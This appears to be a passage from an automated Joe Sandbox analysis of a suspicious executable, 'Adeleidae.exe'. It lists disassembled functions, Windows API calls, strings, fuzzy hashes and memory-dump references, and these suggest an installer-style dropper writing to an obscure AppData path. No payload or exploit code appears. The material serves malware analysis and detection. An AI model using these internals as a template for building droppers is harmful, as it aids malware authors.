Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Adeleidae.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Adeleidae.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 00404704
Space required: , xrefs: 00404715, 0040471A, 00404725
A, xrefs: 004046D7

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Space required:
API String ID: 2624150263-2062246113
Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
Opcode Fuzzy Hash: 6f386f7cffff390e3bfd420b1b91f24d00af43437859eb11e11d3a2aab866b7e
Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

Function 0040686A Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04

Function 00407041 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95

Function 004042B6 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

-B@, xrefs: 004044C2
Space required: , xrefs: 00404493
N, xrefs: 00404452
open, xrefs: 004044C5

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$N$Space required: $open
API String ID: 3615053054-3693965759
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

[Rename], xrefs: 00405E65, 00405E77
%ls=%ls, xrefs: 00405DF1
NUL, xrefs: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 004062E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Adeleidae.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Adeleidae.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

Strings

*?|<>/":, xrefs: 0040633B
"C:\Users\user\Desktop\Adeleidae.exe", xrefs: 0040632D
C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Adeleidae.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4265107816
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

